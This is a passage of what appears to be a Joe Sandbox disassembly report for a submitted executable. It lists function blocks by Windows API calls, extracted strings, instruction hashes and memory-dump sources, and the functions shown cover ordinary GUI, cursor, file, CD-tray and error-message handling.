                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                    • String ID: %s%u
                                                                                                                    • API String ID: 3744389584-679674701
                                                                                                                    • Opcode ID: 8dd15a74f5ab6b2400f8ba837954f4a3786de817ee0fe979fdcf5aa27ad12154
                                                                                                                    • Instruction ID: e423cae7df403c612a7a86509a008f97dbb4a3300234776ed44a501910e39f1f
                                                                                                                    • Opcode Fuzzy Hash: 8dd15a74f5ab6b2400f8ba837954f4a3786de817ee0fe979fdcf5aa27ad12154
                                                                                                                    • Instruction Fuzzy Hash: 32A1D331204B46AFD72ADF64C884BAEB7E8FF84311F008529F99DD6150DB38E945CB92
                                                                                                                    APIs
                                                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0037AF18
                                                                                                                    • _wcscmp.LIBCMT ref: 0037AF29
                                                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0037AF51
                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0037AF6E
                                                                                                                    • _wcscmp.LIBCMT ref: 0037AF8C
                                                                                                                    • _wcsstr.LIBCMT ref: 0037AF9D
                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0037AFD5
                                                                                                                    • _wcscmp.LIBCMT ref: 0037AFE5
                                                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0037B00C
                                                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0037B055
                                                                                                                    • _wcscmp.LIBCMT ref: 0037B065
                                                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0037B08D
                                                                                                                    • GetWindowRect.USER32(00000004,?), ref: 0037B0F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                    • String ID: @$ThumbnailClass
                                                                                                                    • API String ID: 1788623398-1539354611
                                                                                                                    • Opcode ID: 209b0f6b679a4991e5735fd90e609f097826fb54e4b7cb8e28d2ed47286f90e0
                                                                                                                    • Instruction ID: b2f1d5b9d925998c553dee2907eff2807fba21453d07b4731d037348931a64da
                                                                                                                    • Opcode Fuzzy Hash: 209b0f6b679a4991e5735fd90e609f097826fb54e4b7cb8e28d2ed47286f90e0
                                                                                                                    • Instruction Fuzzy Hash: C98190711082059FDB26DF10C885FAAB7E8FF94714F04C56AFD898A095DB38DD49CBA1
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00322612: GetWindowLongW.USER32(?,000000EB), ref: 00322623
                                                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 003AC627
                                                                                                                      • Part of subcall function 003AAB37: ClientToScreen.USER32(?,?), ref: 003AAB60
                                                                                                                      • Part of subcall function 003AAB37: GetWindowRect.USER32(?,?), ref: 003AABD6
                                                                                                                      • Part of subcall function 003AAB37: PtInRect.USER32(?,?,003AC014), ref: 003AABE6
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 003AC690
                                                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003AC69B
                                                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003AC6BE
                                                                                                                    • _wcscat.LIBCMT ref: 003AC6EE
                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003AC705
                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 003AC71E
                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 003AC735
                                                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 003AC757
                                                                                                                    • DragFinish.SHELL32(?), ref: 003AC75E
                                                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003AC851
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pb>
                                                                                                                    • API String ID: 169749273-1481265074
                                                                                                                    • Opcode ID: 4a9fbfab9b774d9d2ba9752c9fe6353e2d16a505e8ea9c71da166f3df52a76a2
                                                                                                                    • Instruction ID: a0ff9ddf21d5f654e295ce1d4b9ed7d4584a311cdf68b047e12a58bac83b6f55
                                                                                                                    • Opcode Fuzzy Hash: 4a9fbfab9b774d9d2ba9752c9fe6353e2d16a505e8ea9c71da166f3df52a76a2
                                                                                                                    • Instruction Fuzzy Hash: 05615D72108310AFC712EF64DC85D9BBBE8EF89710F04092EF595961B1DB709A49CB92
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __wcsnicmp
                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                    • API String ID: 1038674560-1810252412
                                                                                                                    • Opcode ID: 0be652e8f8df24896c9cc231ab346cdaf826521001df3c77fa8b54c0aa013817
                                                                                                                    • Instruction ID: 477423ef759cd501d315f456e9bd403f4bd04b7b5e35632225d7c16abcb015ac
                                                                                                                    • Opcode Fuzzy Hash: 0be652e8f8df24896c9cc231ab346cdaf826521001df3c77fa8b54c0aa013817
                                                                                                                    • Instruction Fuzzy Hash: 7931A33294861ABADB27FB60ED03EEE77A4AF10750F60402AF445B92D1FF656F04C652
                                                                                                                    APIs
                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00395013
                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0039501E
                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00395029
                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00395034
                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 0039503F
                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0039504A
                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00395055
                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00395060
                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0039506B
                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00395076
                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00395081
                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0039508C
                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00395097
                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 003950A2
                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 003950AD
                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 003950B8
                                                                                                                    • GetCursorInfo.USER32(?), ref: 003950C8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$Load$Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2577412497-0
                                                                                                                    • Opcode ID: 416c1e471c210b6358f60a41b8d6f6bd0ca66932b84f1ca4eef7e82105d01578
                                                                                                                    • Instruction ID: e4fa7e85de101aa3b07bd6a904c1af5a74e19f6024f17d74534882f41da73021
                                                                                                                    • Opcode Fuzzy Hash: 416c1e471c210b6358f60a41b8d6f6bd0ca66932b84f1ca4eef7e82105d01578
                                                                                                                    • Instruction Fuzzy Hash: BF3103B1D483196ADF119FB68C8996FBFE8FF04750F50452AE50DE7280DA78A5408F91
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 003AA259
                                                                                                                    • DestroyWindow.USER32(?,?), ref: 003AA2D3
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003AA34D
                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003AA36F
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003AA382
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 003AA3A4
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00320000,00000000), ref: 003AA3DB
                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003AA3F4
                                                                                                                    • GetDesktopWindow.USER32 ref: 003AA40D
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 003AA414
                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003AA42C
                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003AA444
                                                                                                                      • Part of subcall function 003225DB: GetWindowLongW.USER32(?,000000EB), ref: 003225EC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                    • API String ID: 1297703922-3619404913
                                                                                                                    • Opcode ID: c935dd327f8eea9b533be7e464ccfa4108c5b0a553028fb064090e169dc36965
                                                                                                                    • Instruction ID: d5d2a3cd6d9e71af5beb0250e798004425e98d1c897b48ba70178dad55e2d2bc
                                                                                                                    • Opcode Fuzzy Hash: c935dd327f8eea9b533be7e464ccfa4108c5b0a553028fb064090e169dc36965
                                                                                                                    • Instruction Fuzzy Hash: D671BF76140644AFD726DF28CC49F6A7BE9FB8A304F05452DF9858B3A0D771E902CB52
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 003A4424
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003A446F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                    • Opcode ID: a37fa7e890cf7016c27d7ebcd82937e2a526e271eaf61fe7da5f54bba14d023b
                                                                                                                    • Instruction ID: 29bf95b26fa0c74068fd7b9d485bc9e049231b981a0f1a7feabac2d613d0349e
                                                                                                                    • Opcode Fuzzy Hash: a37fa7e890cf7016c27d7ebcd82937e2a526e271eaf61fe7da5f54bba14d023b
                                                                                                                    • Instruction Fuzzy Hash: CC918D356043119FCB06EF10D451A6EB7E1EF9A350F05886AF89A5F7A2CB74ED09CB81
                                                                                                                    APIs
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003AB8B4
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003A91C2), ref: 003AB910
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AB949
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003AB98C
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AB9C3
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 003AB9CF
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003AB9DF
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,003A91C2), ref: 003AB9EE
                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003ABA0B
                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003ABA17
                                                                                                                      • Part of subcall function 00342EFD: __wcsicmp_l.LIBCMT ref: 00342F86
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                    • API String ID: 1212759294-1154884017
                                                                                                                    • Opcode ID: 9e29332c3b4d38aa5a50f60587532db700512296913fea9c31b5cde1aff84d63
                                                                                                                    • Instruction ID: 13f0d2b9d15a45b304fb8dd93b8daa69977bb6c52d6f32781f4107fec5ee7689
                                                                                                                    • Opcode Fuzzy Hash: 9e29332c3b4d38aa5a50f60587532db700512296913fea9c31b5cde1aff84d63
                                                                                                                    • Instruction Fuzzy Hash: A461EE71900215BEEB16DF64DC41FBFB7ACEB0A710F10411AF915DA1D2DB74A980D7A0
                                                                                                                    APIs
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0038DCDC
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0038DCEC
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0038DCF8
                                                                                                                    • __wsplitpath.LIBCMT ref: 0038DD56
                                                                                                                    • _wcscat.LIBCMT ref: 0038DD6E
                                                                                                                    • _wcscat.LIBCMT ref: 0038DD80
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0038DD95
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0038DDA9
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0038DDDB
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0038DDFC
                                                                                                                    • _wcscpy.LIBCMT ref: 0038DE08
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0038DE47
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 3566783562-438819550
                                                                                                                    • Opcode ID: 2e01382a1561b330dfb8089d1150f8e456c696a0826133496f9a288a188def66
                                                                                                                    • Instruction ID: 1bd9102cfd4b87aceadf0dbb709eb304590a4b38e05d08bd2917db43911e7f14
                                                                                                                    • Opcode Fuzzy Hash: 2e01382a1561b330dfb8089d1150f8e456c696a0826133496f9a288a188def66
                                                                                                                    • Instruction Fuzzy Hash: 7E619B725043059FCB11EF60D844AAEB3E8FF89310F04496EF999DB291EB31E945CB92
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00389C7F
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00389CA0
                                                                                                                    • __swprintf.LIBCMT ref: 00389CF9
                                                                                                                    • __swprintf.LIBCMT ref: 00389D12
                                                                                                                    • _wprintf.LIBCMT ref: 00389DB9
                                                                                                                    • _wprintf.LIBCMT ref: 00389DD7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 311963372-3080491070
                                                                                                                    • Opcode ID: bf8dd66bbef0ef6a8d4df75c964edfebf514580876beb7dd8db3e28fb3c5f915
                                                                                                                    • Instruction ID: aff88f1794939511277faaffaf97e1f12c49cfc44a2db5a3683730243601f2d5
                                                                                                                    • Opcode Fuzzy Hash: bf8dd66bbef0ef6a8d4df75c964edfebf514580876beb7dd8db3e28fb3c5f915
                                                                                                                    • Instruction Fuzzy Hash: F8517032900619AACF16EBE0ED86EEEB778BF14300F100566F5057A1A1DB352F58DB50
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0038A3CB
                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0038A418
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038A460
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038A497
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038A4C5
                                                                                                                      • Part of subcall function 00327BCC: _memmove.LIBCMT ref: 00327C06
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 2698844021-4113822522
                                                                                                                    • Opcode ID: d0a660bbed408f167b15617bae9870607201fd9a8238aeab254cbf822a029d2b
                                                                                                                    • Instruction ID: 131ebf866a59f350553cf80be99db3fc2e637cd2900bca6d085d62995d2cba47
                                                                                                                    • Opcode Fuzzy Hash: d0a660bbed408f167b15617bae9870607201fd9a8238aeab254cbf822a029d2b
                                                                                                                    • Instruction Fuzzy Hash: E7517F761047159FC706EF11D89196AB3E8FF85718F10486EF8899B361DB31EE09CB92
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0035E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0037F8DF
                                                                                                                    • LoadStringW.USER32(00000000,?,0035E029,00000001), ref: 0037F8E8
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0035E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0037F90A
                                                                                                                    • LoadStringW.USER32(00000000,?,0035E029,00000001), ref: 0037F90D
                                                                                                                    • __swprintf.LIBCMT ref: 0037F95D
                                                                                                                    • __swprintf.LIBCMT ref: 0037F96E
                                                                                                                    • _wprintf.LIBCMT ref: 0037FA17
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0037FA2E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    • API String ID: 984253442-2268648507
                                                                                                                    • Opcode ID: 09df387d537b6167bdc029028538249859a22eb9ae76d2a0a9346a3d39ec6ca1
                                                                                                                    • Instruction ID: efc3959f618d3e6ef5cffec0a0471a2a08c0ffa3c73f9992eafa340b83d0398a
                                                                                                                    • Opcode Fuzzy Hash: 09df387d537b6167bdc029028538249859a22eb9ae76d2a0a9346a3d39ec6ca1
                                                                                                                    • Instruction Fuzzy Hash: 71410F72804129AACF16FFE0ED86DEE7778AF15300F500465F509BA1A1EB356F49CB61
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,003A9207,?,?), ref: 003ABA56
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,003A9207,?,?,00000000,?), ref: 003ABA6D
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,003A9207,?,?,00000000,?), ref: 003ABA78
• CloseHandle.KERNEL32(00000000,?,?,?,?,003A9207,?,?,00000000,?), ref: 003ABA85
• GlobalLock.KERNEL32(00000000), ref: 003ABA8E
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,003A9207,?,?,00000000,?), ref: 003ABA9D
• GlobalUnlock.KERNEL32(00000000), ref: 003ABAA6
